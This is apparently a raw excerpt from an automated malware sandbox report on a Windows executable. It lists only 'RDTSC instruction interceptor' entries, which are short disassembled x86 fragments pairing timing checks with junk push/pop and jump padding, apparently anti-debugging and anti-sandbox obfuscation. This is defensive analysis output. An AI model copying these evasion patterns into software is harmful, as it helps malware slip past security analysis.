Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 16314C8 second address: 16314F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C1180B40h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FC7C1180B45h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 163163C second address: 1631642 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 1631642 second address: 1631646 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15E81C7 second address: 15E821C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C0FA6747h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a ja 00007FC7C0FA673Fh 0x00000010 mov ebx, dword ptr [ebp+1247B15Bh] 0x00000016 pushad 0x00000017 movsx edi, bx 0x0000001a mov edx, dword ptr [ebp+122DB4B4h] 0x00000020 popad 0x00000021 add eax, ebx 0x00000023 xor cx, B034h 0x00000028 nop 0x00000029 pushad 0x0000002a jmp 00007FC7C0FA673Ch 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15E821C second address: 15E8220 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15E8220 second address: 15E828D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 jnl 00007FC7C0FA6738h 0x0000000f pop eax 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push ecx 0x00000014 call 00007FC7C0FA6738h 0x00000019 pop ecx 0x0000001a mov dword ptr [esp+04h], ecx 0x0000001e add dword ptr [esp+04h], 00000015h 0x00000026 inc ecx 0x00000027 push ecx 0x00000028 ret 0x00000029 pop ecx 0x0000002a ret 0x0000002b mov edx, dword ptr [ebp+122D37CDh] 0x00000031 push 00000004h 0x00000033 push 00000000h 0x00000035 push ebp 0x00000036 call 00007FC7C0FA6738h 0x0000003b pop ebp 0x0000003c mov dword ptr [esp+04h], ebp 0x00000040 add dword ptr [esp+04h], 00000014h 0x00000048 inc ebp 0x00000049 push ebp 0x0000004a ret 0x0000004b pop ebp 0x0000004c ret 0x0000004d stc 0x0000004e mov ecx, dword ptr [ebp+122D3829h] 0x00000054 nop 0x00000055 push edi 0x00000056 push eax 0x00000057 push edx 0x00000058 jmp 00007FC7C0FA673Eh 0x0000005d rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15E828D second address: 15E829E instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC7C1180B36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15E829E second address: 15E82B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC7C0FA6743h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 1635DB9 second address: 1635DDD instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FC7C1180B4Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 1635DDD second address: 1635DE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 163BEEC second address: 163BEF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 163C354 second address: 163C371 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 jmp 00007FC7C0FA6741h 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 163C612 second address: 163C61D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007FC7C1180B36h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 163C61D second address: 163C677 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnc 00007FC7C0FA6750h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e pushad 0x0000000f push esi 0x00000010 pop esi 0x00000011 pushad 0x00000012 popad 0x00000013 jnp 00007FC7C0FA6736h 0x00000019 jl 00007FC7C0FA6736h 0x0000001f popad 0x00000020 push ecx 0x00000021 push ebx 0x00000022 pop ebx 0x00000023 pushad 0x00000024 popad 0x00000025 pop ecx 0x00000026 pushad 0x00000027 jmp 00007FC7C0FA6747h 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 163C917 second address: 163C92C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jng 00007FC7C1180B36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push edi 0x0000000e pop edi 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 163D9D4 second address: 163D9F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 jmp 00007FC7C0FA6749h 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 1645B32 second address: 1645B5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC7C1180B48h 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jns 00007FC7C1180B38h 0x00000012 push esi 0x00000013 push edx 0x00000014 pop edx 0x00000015 pop esi 0x00000016 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15AA5A1 second address: 15AA5A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15AA5A5 second address: 15AA5BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15AA5BB second address: 15AA5C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15AA5C2 second address: 15AA5DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FC7C1180B36h 0x0000000a jmp 00007FC7C1180B43h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 1644CBA second address: 1644CBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 1644CBF second address: 1644CC4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 1644E29 second address: 1644E2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 16453FE second address: 164541C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007FC7C1180B48h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 164555D second address: 1645562 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 1645833 second address: 164583E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FC7C1180B36h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 1647033 second address: 164703A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 164DC38 second address: 164DC4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FC7C1180B3Eh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 164DC4E second address: 164DC5D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C0FA673Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 164E6E4 second address: 164E6F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 164E6F0 second address: 164E704 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC7C0FA6736h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c ja 00007FC7C0FA6736h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 164E704 second address: 164E708 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 164CF15 second address: 164CF22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 164CF22 second address: 164CF26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 1655054 second address: 165508F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C0FA6749h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FC7C0FA6746h 0x00000010 jl 00007FC7C0FA6736h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 165508F second address: 1655093 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 1655093 second address: 16550A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jmp 00007FC7C0FA673Bh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 16550A7 second address: 16550B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push ebx 0x00000006 pushad 0x00000007 popad 0x00000008 pop ebx 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 16550B6 second address: 16550C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 popad 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 16550C2 second address: 16550CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FC7C1180B36h 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 16550CD second address: 16550D7 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FC7C0FA673Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 165524C second address: 1655252 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 165FF33 second address: 165FF38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 165FF38 second address: 165FF3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 165FF3E second address: 165FF42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 165FF42 second address: 165FF5A instructions: 0x00000000 rdtsc 0x00000002 ja 00007FC7C1180B36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a js 00007FC7C1180B42h 0x00000010 jns 00007FC7C1180B36h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 1663057 second address: 166305B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 166305B second address: 1663060 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 1663190 second address: 1663196 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 1663196 second address: 16631D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 jno 00007FC7C1180B36h 0x0000000c pop ecx 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push ecx 0x00000011 jmp 00007FC7C1180B49h 0x00000016 jmp 00007FC7C1180B42h 0x0000001b pop ecx 0x0000001c push eax 0x0000001d push edx 0x0000001e push edi 0x0000001f pop edi 0x00000020 push ebx 0x00000021 pop ebx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 16631D9 second address: 16631EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C0FA673Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 1669918 second address: 166992F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jp 00007FC7C1180B3Ah 0x0000000f push edx 0x00000010 pop edx 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 166992F second address: 1669935 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 1669935 second address: 1669956 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007FC7C1180B45h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 1669956 second address: 166995A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 16742CD second address: 16742DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FC7C1180B36h 0x0000000a push edx 0x0000000b pop edx 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 16742DA second address: 16742EC instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FC7C0FA6738h 0x00000008 push eax 0x00000009 push edx 0x0000000a je 00007FC7C0FA6736h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 167411D second address: 1674149 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FC7C1180B36h 0x0000000a pushad 0x0000000b jmp 00007FC7C1180B46h 0x00000010 pushad 0x00000011 jc 00007FC7C1180B36h 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 1677AB8 second address: 1677ABE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 1677ABE second address: 1677AC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 1677AC4 second address: 1677AC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 1677AC8 second address: 1677ACC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 16778C1 second address: 16778F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C0FA6747h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FC7C0FA6746h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 168149E second address: 16814C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jmp 00007FC7C1180B41h 0x0000000c pop ecx 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jnp 00007FC7C1180B38h 0x00000016 push edx 0x00000017 pop edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 16814C2 second address: 16814DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FC7C0FA673Ch 0x0000000a popad 0x0000000b pushad 0x0000000c jl 00007FC7C0FA6736h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 167FCEB second address: 167FD12 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C1180B3Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FC7C1180B3Ch 0x0000000e push ecx 0x0000000f jp 00007FC7C1180B36h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 168040E second address: 1680412 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 16806B0 second address: 16806E1 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FC7C1180B36h 0x00000008 jmp 00007FC7C1180B45h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jne 00007FC7C1180B42h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 16806E1 second address: 168070A instructions: 0x00000000 rdtsc 0x00000002 ja 00007FC7C0FA673Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b jbe 00007FC7C0FA673Ch 0x00000011 jbe 00007FC7C0FA6736h 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FC7C0FA673Ah 0x0000001e rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 16811A8 second address: 16811B8 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FC7C1180B36h 0x00000008 jno 00007FC7C1180B36h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 16811B8 second address: 16811C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC7C0FA673Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 1685B32 second address: 1685B38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 1685B38 second address: 1685B42 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC7C0FA6736h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 1687576 second address: 1687580 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 1687580 second address: 168758F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC7C0FA673Ah 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 16D2309 second address: 16D230E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 16D4C35 second address: 16D4C44 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C0FA673Ah 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 16D4C44 second address: 16D4C70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007FC7C1180B49h 0x00000011 jno 00007FC7C1180B36h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 16D4C70 second address: 16D4C7B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 push edi 0x00000006 pop edi 0x00000007 pop ebx 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 1799562 second address: 1799566 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 1799566 second address: 179956F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 17996E0 second address: 1799724 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jl 00007FC7C1180B36h 0x0000000f jmp 00007FC7C1180B45h 0x00000014 jnp 00007FC7C1180B36h 0x0000001a popad 0x0000001b push eax 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FC7C1180B44h 0x00000023 push ebx 0x00000024 pop ebx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 179989D second address: 17998FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC7C0FA6740h 0x00000008 jc 00007FC7C0FA6736h 0x0000000e jmp 00007FC7C0FA6745h 0x00000013 popad 0x00000014 ja 00007FC7C0FA674Dh 0x0000001a pop edx 0x0000001b pop eax 0x0000001c pushad 0x0000001d jmp 00007FC7C0FA673Ch 0x00000022 pushad 0x00000023 pushad 0x00000024 popad 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 1799D5A second address: 1799D5F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 179A024 second address: 179A02A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
